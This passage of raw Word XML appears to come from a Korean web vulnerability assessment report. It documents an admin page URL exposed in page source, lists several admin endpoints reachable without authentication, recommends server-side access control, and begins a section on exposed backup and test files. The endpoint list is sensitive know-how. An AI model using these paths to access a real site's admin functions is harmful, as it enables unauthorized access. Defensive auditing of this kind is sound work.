                          <a:ext cx="628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67271" id="직사각형 1951474568" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:301.3pt;margin-top:231.75pt;width:49.5pt;height:1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UtwIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHejJG2jbKqoVRBS&#10;1Va0qGfHaycreT3GdrIJt/IOSLwBFw48FyrvwNj706hUHBA5OJ6dmW883/xMz3aVIlthXQk6p9lR&#10;SonQHIpSr3L64W7x5oQS55kumAItcroXjp7NXr+a1mYiBrAGVQhLEES7SW1yuvbeTJLE8bWomDsC&#10;IzQqJdiKeRTtKiksqxG9UskgTcdJDbYwFrhwDr9eNEo6i/hSCu6vpXTCE5VTfJuPp43nMpzJbMom&#10;K8vMuuTtM9g/vKJipcagPdQF84xsbPkHVFVyCw6kP+JQJSBlyUXMAbPJ0mfZ3K6ZETEXJMeZnib3&#10;/2D51fbGkrLA2p2OsuHxcDTGimlWYa0evz08fv7+88fDr69fyIEaOauNm6DrrbmxreTwGgjYSVuF&#10;f0yN7CLP+55nsfOE48fx4GQ8wmpwVGWjwTCNdUienI11/q2AioRLTi2WMbLLtpfOY0A07UxCLA2L&#10;UqlYSqVJHXJJET+oHKiyCNoo2NXyXFmyZdgNi0WKv9AAiHZghpLS+DGk2CQVb36vRMBQ+r2QSBim&#10;MWgihFYVPSzjXGifNao1K0QTbXQYrPOIoSNgQJb4yh67BegsG5AOu3lzax9cRez03rlN/W/OvUeM&#10;DNr3zlWpwb6UmcKs2siNfUdSQ01gaQnFHtvJQjNnzvBFiRW8ZM7fMIuDhUXHZeGv8ZAKsFLQ3ihZ&#10;g/300vdgj/2OWkpqHNScuo8bZgUl6p3GSTjNhsMw2VEYjo4HKNhDzfJQozfVOWD1M1xLhsdrsPeq&#10;u0oL1T3ulHmIiiqmOcbOKfe2E859s0BwK3Exn0cznGbD/KW+NTyAB1ZDh97t7pk1bRt77P8r6Iaa&#10;TZ51c2MbPDXMNx5kGVv9ideWb9wEsXHarRVWzaEcrZ526+w3AAAA//8DAFBLAwQUAAYACAAAACEA&#10;+uVss98AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMAyG70i8Q2QkbixZYG1Vmk6AhBCI&#10;Awy4Z03WVkucqsna8vaYExz9+9Pvz9V28Y5Ndox9QAXrlQBmsQmmx1bB58fjVQEsJo1Gu4BWwbeN&#10;sK3PzypdmjDju512qWVUgrHUCrqUhpLz2HTW67gKg0XaHcLodaJxbLkZ9Uzl3nEpRMa97pEudHqw&#10;D51tjruTV/AWjgfuvqR8ye+fZP7si7mdXpW6vFjuboElu6Q/GH71SR1qctqHE5rInIJMyIxQBTfZ&#10;9QYYEblYU7KnpMg3wOuK//+h/gEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAOHJBUtwIA&#10;AKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD65Wyz&#10;3wAAAAsBAAAPAAAAAAAAAAAAAAAAABEFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;HQYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BE6966" w:rsidRPr="00BE6966">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5C84A7" wp14:editId="3B65AE8F">
            <wp:extent cx="4572000" cy="3338337"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="14605"/>
            <wp:docPr id="1293467089" name="그림 129346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038" r="1915" b="8554"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="33383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BF0B51" w14:textId="6CB86B20" w:rsidR="00694EF1" w:rsidRDefault="00BE6966" w:rsidP="004846DD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="_Toc209094653"/>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80</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00923899">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00923899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠폰 페이지 소스 보기 클</w:t>
      </w:r>
      <w:r w:rsidR="00694EF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w14:paraId="7440B919" w14:textId="5F7AB20B" w:rsidR="004846DD" w:rsidRDefault="00694EF1" w:rsidP="004846DD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251846656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="010D312F" wp14:editId="46E6777F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1913255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1123315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="821871" cy="141514"/>
                <wp:effectExtent l="0" t="0" r="16510" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="1293467091" name="직사각형 1293467091"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="821871" cy="1415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44F3F" id="직사각형 1293467091" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:150.65pt;margin-top:88.45pt;width:64.7pt;height:11.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rguQIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0muncRC5MBI4KJA&#10;kARNiqxpirQEUCRL0pbdXXqHAL1BN130XEV6hw5JSTHSoIuiXtCkZubNzJvPyem2EWjDjK2VLHB2&#10;kGLEJFVlLVcF/ni7eHOMkXVElkQoyQq8Yxafzl6/Oml1zkaqUqJkBgGItHmrC1w5p/MksbRiDbEH&#10;SjMJQq5MQxw8zSopDWkBvRHJKE0Pk1aZUhtFmbXw9TwK8Szgc86ou+LcModEgSE2F04TzqU/k9kJ&#10;yVeG6KqmXRjkH6JoSC3B6QB1ThxBa1P/AdXU1CiruDugqkkU5zVlIQfIJkufZXNTEc1CLkCO1QNN&#10;9v/B0svNtUF1CbUbTd+OD4/SaYaRJA3U6vHb/eOX7z9/3P/6+oD2xMBZq20Opjf62nQvC1dPwJab&#10;xv9DamgbeN4NPLOtQxQ+Ho+y4yNwQ0GUjbNJNvZ1SJ6MtbHuHVMN8pcCGyhjYJdsLqyLqr2K9yXV&#10;ohYCvpNcSNQC6DSdpMHCKlGXXuqF1qyWZ8KgDYFuWCxS+HWO99QgDCEhGp9iTCrc3E6w6OAD40AY&#10;pDGKHnyrsgGWUMqky6KoIiWL3ib7znqLkLOQAOiROUQ5YHcAvWYE6bEjA52+N2Wh0wfjLvW/GQ8W&#10;wbOSbjBuaqnMS5kJyKrzHPV7kiI1nqWlKnfQTkbFObOaLmqo4AWx7poYGCwYQVgW7goOLhRUSnU3&#10;jCplPr/03etDv4MUoxYGtcD205oYhpF4L2ESptl47Cc7PMaToxE8zL5kuS+R6+ZMQfWh+yC6cPX6&#10;TvRXblRzBztl7r2CiEgKvgtMnekfZy4uENhKlM3nQQ2mWRN3IW809eCeVd+ht9s7YnTXxg76/1L1&#10;Q03yZ90cdb2lVPO1U7wOrf7Ea8c3bILQON3W8qtm/x20nnbr7DcAAAD//wMAUEsDBBQABgAIAAAA&#10;IQAuP/1r4AAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLFmK1rU0nQAJ&#10;IdAOMLZ71nhttSapmqwtb485wdH+P/3+XGxm27ERh9B6p2C5EMDQVd60rlaw/3q5WwMLUTujO+9Q&#10;wTcG2JTXV4XOjZ/cJ467WDMqcSHXCpoY+5zzUDVodVj4Hh1lJz9YHWkcam4GPVG57bgUYsWtbh1d&#10;aHSPzw1W593FKvjw5xPvDlK+p0+vMn2z66ket0rd3syPD8AizvEPhl99UoeSnI7+4kxgnYJELBNC&#10;KUhXGTAi7hORAjvSJssk8LLg/38ofwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCIf9rg&#10;uQIAAKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAu&#10;P/1r4AAAAAsBAAAPAAAAAAAAAAAAAAAAABMFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAIAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004846DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53CDB930" wp14:editId="12830AEC">
            <wp:extent cx="4572000" cy="2120216"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
            <wp:docPr id="1293467090" name="그림 12934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930" b="59572"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="21202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D4231" w14:textId="0481852A" w:rsidR="004D2762" w:rsidRDefault="004846DD" w:rsidP="004D2762">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="_Toc209094654"/>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81</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00694EF1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00694EF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">페이지 소스 내 관리자 페이지 </w:t>
      </w:r>
      <w:r w:rsidR="00694EF1">
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r w:rsidR="00694EF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>노출</w:t>
      </w:r>
      <w:bookmarkEnd w:id="454"/>
    </w:p>
    <w:p w14:paraId="38FBDADE" w14:textId="77777777" w:rsidR="004D2762" w:rsidRDefault="004D2762" w:rsidP="004D2762">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EAC984" w14:textId="6C31439D" w:rsidR="004D2762" w:rsidRDefault="004D2762" w:rsidP="004D2762">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BDD842D" wp14:editId="4846B3A9">
            <wp:extent cx="4571752" cy="2272393"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="13970"/>
            <wp:docPr id="1293467092" name="그림 129346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815"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="22725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188289" w14:textId="4AA19877" w:rsidR="00BE6966" w:rsidRDefault="004D2762" w:rsidP="004D2762">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="455" w:name="_Toc209094655"/>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82</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자 페이지의 쿠폰 관리 페이지로 검증 없이 접근 가능</w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w14:paraId="79AE6CA6" w14:textId="2D852F00" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B206F8" w14:textId="77777777" w:rsidR="00DF12B8" w:rsidRPr="00CB22A6" w:rsidRDefault="00DF12B8" w:rsidP="00DF12B8">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188"/>
        <w:gridCol w:w="4962"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF12B8" w:rsidRPr="00B112DB" w14:paraId="10FA419F" w14:textId="77777777" w:rsidTr="00041DFF">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28C2511B"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188" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41AE39B2"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962" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53E8470B"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7D2C31" w:rsidRPr="00B112DB" w14:paraId="5745C6D6"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BB43552" w14:textId="7955D62C" w:rsidR="007D2C31" w:rsidRPr="00CB22A6" w:rsidRDefault="007D2C31" w:rsidP="007D2C3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E6C58" w14:textId="239BC9D9" w:rsidR="007D2C31" w:rsidRPr="00CB22A6"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63F58FD" w14:textId="6DB7295D" w:rsidR="007D2C31" w:rsidRPr="00CB22A6"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member_admin.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="1BC95910"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AE9F349" w14:textId="259CFC1E" w:rsidR="007D2C31" w:rsidRPr="00CB22A6" w:rsidRDefault="007D2C31" w:rsidP="007D2C3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26EE71" w14:textId="742A8B7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2C96445C" w14:textId="26BAB4EC" w:rsidR="007D2C31" w:rsidRPr="00987A57"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/checkPing.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="42C4B241"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66A73E9" w14:textId="2F483FB7" w:rsidR="007D2C31" w:rsidRPr="00CB22A6"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ED74DC" w14:textId="6A2D0287"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0CA8CCC7" w14:textId="63BB7702"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/order_admin_a.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="3DC208FC"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3FD2A94" w14:textId="57DF701B"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5730A8" w14:textId="31DC9D5E"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05F25C0D" w14:textId="29D16730"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/order_detail.do?order_no=16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="561F7E00"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271530D" w14:textId="1131B3FF"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8BD55D" w14:textId="3AD309FD"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1F85411B" w14:textId="61705FA5"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/shop/goodsModifyForm.do?type=modify&amp;IDX=411</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="56B3E48A"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F0B3DCA" w14:textId="4E5375AC"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4E575B" w14:textId="72D624C4" w:rsidR="007D2C31" w:rsidRDefault="007D2C31" w:rsidP="007D2C31">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F3BDB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>메인</w:t>
            </w:r>
            <w:r w:rsidRPr="000F3BDB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 페이지 &gt; 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17A2A41" w14:textId="2F123A86" w:rsidR="007D2C31" w:rsidRPr="00181412" w:rsidRDefault="007D2C31" w:rsidP="007D2C31">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F3BDB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/openGoodsWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="56600C79"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9DBC88B" w14:textId="3DCB5FD0"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7</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A94074" w14:textId="3E2790F2" w:rsidR="007D2C31" w:rsidRPr="000F3BDB"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4B1A98AD" w14:textId="695BEAA3" w:rsidR="007D2C31" w:rsidRPr="000F3BDB"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/as_admin.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="1E2BCA28"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AACABB3" w14:textId="10F7252B"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8</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439BEA" w14:textId="7459A4C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45C12817" w14:textId="064565C1"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/goodsManage.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="4272AF44"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1682038" w14:textId="44BAA329"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9</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8E4B5" w14:textId="4712457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245A977F" w14:textId="2F5D5E3A" w:rsidR="007D2C31" w:rsidRPr="00181412"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adminCouponList.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2C31" w:rsidRPr="00B112DB" w14:paraId="6C65B133" w14:textId="77777777" w:rsidTr="00041D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E58A668" w14:textId="144BED50"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10</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F4A80B" w14:textId="3FDBCC3C"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9DF73AE" w14:textId="2BF4AAFE" w:rsidR="007D2C31" w:rsidRPr="00181412"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adminCouponWriteForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="017D71A8" w14:textId="77777777" w:rsidR="00DF12B8" w:rsidRPr="00186FBD" w:rsidRDefault="00DF12B8" w:rsidP="00DF12B8">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447DDBD3" w14:textId="77777777" w:rsidR="00DF12B8" w:rsidRPr="00CB22A6" w:rsidRDefault="00DF12B8" w:rsidP="00DF12B8">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B67046C" w14:textId="6F854D35" w:rsidR="00DF12B8" w:rsidRDefault="00C10F70" w:rsidP="00DF12B8">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00C10F70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10F70">
        <w:t xml:space="preserve"> 페이지 및 메뉴에 대해 인증 및 권한 검증 로직을 필수 적용하여 비인가 사용자의 접근을 차단해야 합니다. 또한</w:t>
      </w:r>
      <w:r w:rsidR="00EA47A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10F70">
        <w:t xml:space="preserve"> 접근 제어 정책을 서버 측에서 강제해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BA01D" w14:textId="77777777" w:rsidR="00700AD2" w:rsidRDefault="00700AD2" w:rsidP="001B5E55">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BAAA45" w14:textId="005F2100" w:rsidR="00DA1F20" w:rsidRDefault="00DA1F20">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="733A0E13" w14:textId="0B86B1E5" w:rsidR="00DA1F20" w:rsidRDefault="00DA1F20" w:rsidP="00DA1F20">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="_Toc209094570"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>위치 공개</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
    </w:p>
    <w:p w14:paraId="153AD58F" w14:textId="77777777" w:rsidR="00DA1F20" w:rsidRDefault="00DA1F20" w:rsidP="00DA1F20">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F7CBC" w14:textId="73E9A4E9" w:rsidR="00DA1F20" w:rsidRPr="00B5070A" w:rsidRDefault="00DF4446" w:rsidP="00DA1F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개발 과정에서 생성된 백업,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>테스트 파일,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>샘플 디렉터리 등 예측 가능한 경로에 존재하는 불필요한 디렉터리나 파일이 웹에서 노출되어 공격자가 접근하여 시스템 정보,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스 및 설정 등을 수집할 수 있는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이는 불필요한 디렉터리 및 파일을 삭제하지 않았거나 디렉터리 인덱싱을 활성화하는 등의 이유로 발견됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C00EB1A" w14:textId="77777777" w:rsidR="00DA1F20" w:rsidRDefault="00DA1F20" w:rsidP="00DA1F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A47FDC5" w14:textId="77777777" w:rsidR="00DA1F20" w:rsidRPr="00CB22A6" w:rsidRDefault="00DA1F20" w:rsidP="00DA1F20">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8CEA9" w14:textId="51C93788" w:rsidR="00E6172E" w:rsidRDefault="00E52CA1" w:rsidP="00933CCF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>예측</w:t>
      </w:r>
      <w:r w:rsidR="00992194">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있는</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 경로에 존재하는 불필요한 파일 및 페이지에 접근할 수 있는 취약점이 발견되었습니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이는 공격자가 테스</w:t>
      </w:r>
      <w:r w:rsidR="00657995">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>트</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>용 파일이나 개발 잔재 파일을 통해 시스템의 정보를 획득하여 추가적인 공격 경로를 확보할 수 있는 위험이 존재합니다.</w:t>
      </w:r>
      <w:bookmarkStart w:id="457" w:name="_Hlk209094253"/>
      <w:r w:rsidR="00CC12B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E6172E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아래의</w:t>
      </w:r>
      <w:r w:rsidR="00E6172E" w:rsidRPr="00E6172E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
